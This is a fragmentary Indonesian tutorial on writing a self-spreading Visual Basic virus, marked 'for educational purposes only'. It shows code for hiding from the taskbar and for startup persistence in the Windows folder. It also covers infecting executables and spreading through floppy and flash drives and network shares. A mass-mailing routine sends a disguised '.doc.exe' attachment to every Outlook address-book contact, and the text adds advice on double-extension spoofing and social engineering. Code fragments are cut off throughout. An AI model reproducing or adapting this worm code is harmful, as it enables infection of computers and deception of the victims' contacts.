Professional Documents
Culture Documents
Tanpa menggunakan teori yang panjang dan lebar, kita akan membahas bagaimana hal
tersebut diatas dapat dilakukan dengan menggunakan bahasa pemrograman Visual Basic.
Agar program tidak menampilkan dirinya pada Task Bar, dapat digunakan perintah :
App.TaskVisible = False
Me.Visible = False
Agar program exe dapat diaktifkan setiap kali startup system, kita dapat menduplikasi
program ke suatu folder dengan perintah :
FileCopy app.Path & "\" & app.EXEName , environ$("windir") & "\" & app.EXEName
1
Hanya untuk tujuan pendidikan saja
Program Executable
Sehingga setiap kali program yang telah terinfeksi dijalankan, maka Program Virus akan
menginstalasi dirinya ke computer korban dan mengembalikan proses ke Program
Executable.
Jadi pada saat program terinfeksi dijalankan, maka Program Executable harus di pulihkan
kembali dengan melakukan perhitungan :
Posisi Program Executable = Ukuran File – Ukuran Virus – Ukuran Signature Virus
Sesuatu hal yang harus diperhatikan adalah infeksi terhadap Program Executable tidak
boleh dilakukan berulang-ulang dan tidak boleh menginfeksi diri Program Virus sendiri,
sehingga harus ditambahkan suatu Signature Virus
2
Hanya untuk tujuan pendidikan saja
Close fNum
finally:
End If
End If
End If
End Sub
3
Hanya untuk tujuan pendidikan saja
fNum = 0
Do While Dir(exePath & App.EXEName & fNum & ".exe") <> ""
fNum = fNum + 1
Loop
Close #1
Call VirInstall
Call ExecuteOriginal(fname)
Kill fname 'hapus file sementara
End If
End Sub
4
Hanya untuk tujuan pendidikan saja
Menyebarkan dirinya ke Floppy Disk, diaktifkan dengan suatu timer. Program ini bekerja
dengan senantiasa memantau terhadap keaktifkan jendela 3½ Floppy (A:) oleh pemakai.
Menyebarkan dirinya ke Flash Disk, diaktifkan dengan suatu timer. Program ini bekerja
dengan senantiasa memantau removable drive diatas drive C.
Menyebarkan dirinya ke semua resource yang di Share pada computer yang terinfeksi :
5
Hanya untuk tujuan pendidikan saja
target = share
Call InfeksiResource(target, "XLSDOCEXE")
Next share
End If
End Sub
Menyebarkan dirinya ke semua resource share yang terbuka di LAN, dengan mengambil
semua Domain maupun Workgroup dan menyimpannya dalam suatu stack.
Dan Akhirnya mengambil semua resource yang dishare dari masing-masing Computer :
6
Hanya untuk tujuan pendidikan saja
stackDrive.Push (Drive)
End If
Next Drive
End If
End If
End Sub
For i = 1 To Mapi.AddressLists.Count
Set AddressBook = Mapi.AddressLists(i)
For j = 1 To AddressBook.AddressEntries.Count
MailAddress = AddressBook.AddressEntries(j)
Mail.Recipients.Add (MailAddress)
Mail.Subject = "Subject Virus Anda"
Mail.Body = vbCrLf & "Pesan anda agar pemakai tertarik membuka attachment."
Mail.Attachments.Add Environ$("windir") & "\" & attachment & ".doc.exe"
Mail.Send
Next
Next
finally:
Set Outlook = Nothing
Set Mapi = Nothing
7
Hanya untuk tujuan pendidikan saja
End Sub
Penulis tidak akan membahas tentang teknik yang satu ini. Pada dasarnya cara kerjanya
adalah seperti ini, misalnya pada Windows yang otomatis menjalankan file dengan script
extension tertentu (Contoh teknik virus Redlof), sehingga program virus dapat membuat
script tersebut untuk mentrigger program virus.
Ada juga worms yang memanfaatkan kelemahan Outlook Express, dimana secara
otomatis menjalankan Attachment tanpa klik dari pemakai.
Ada juga worms yang menyebarkan diri melalui website, dimana jika anda mengunjungi
suatu website dengan software browser yang memiliki kelemahan, maka secara otomatis
browser mendownload kode yang tidak diinginkan dan menjalankannya.
Ada juga worms yang menyebar melalui media Bluetooth yang dalam keadaan terbuka.
Teknik filename spoofing banyak digunakan oleh worms dewasa ini dengan
menggunakan double extension :
Misalnya :
SuratCinta.doc.pif
Pada system yang settingnya tidak menampilkan extension file maka file tersebut diatas
ditampilkan pada system sebagai :
SuratCinta.doc
Teknik ini adalah gampang-gampang sudah, tetapi sangat mempengaruhi penyebaran dan
siklus hidup virus anda. Social engineering banyak digunakan oleh hacker-hacker untuk
memperdaya dengan pendekatan non-teknis computer, tetapi lebih cenderung kepada
pendekatan manusia.
8
Hanya untuk tujuan pendidikan saja
Ada juga virus yang disebarkan pada game-game maupun crack software yang
menumpang pada program tersebut.
WShell.regwrite “HKCU\
\Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableRegistryTools", 0,
"REG_DWORD"
WShell.regwrite “HKCU\
\Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableCMD", 0,
"REG_DWORD"
Kesimpulan :
9
Hanya untuk tujuan pendidikan saja
Lampiran A
‘API Declaration Modul
Option Explicit
10
Hanya untuk tujuan pendidikan saja
Const RESOURCE_GLOBALNET = 2
Const RESOURCETYPE_DISK = 1
Const RESOURCEDISPLAYTYPE_DOMAIN = 0
Const RESOURCEUSAGE_CONTAINER = 1
Lampiran B
11
Hanya untuk tujuan pendidikan saja
‘Form ff
Option Explicit
Dim SedangInfeksi As Boolean
Dim SpreadEmail As Boolean
Dim Aktifitas As Integer '0 = floppy, 1 = flashdisk
Dim Loncat As Integer
Main Program
Private Sub Form_Load()
Me.Visible = False
Me.Caption = titleSudahLoad
AT.Interval = 1000
SedangInfeksi = False
12
Hanya untuk tujuan pendidikan saja
SpreadEmail = False
Aktifitas = 0
Loncat = 0
AT.Enabled = True
End Sub
13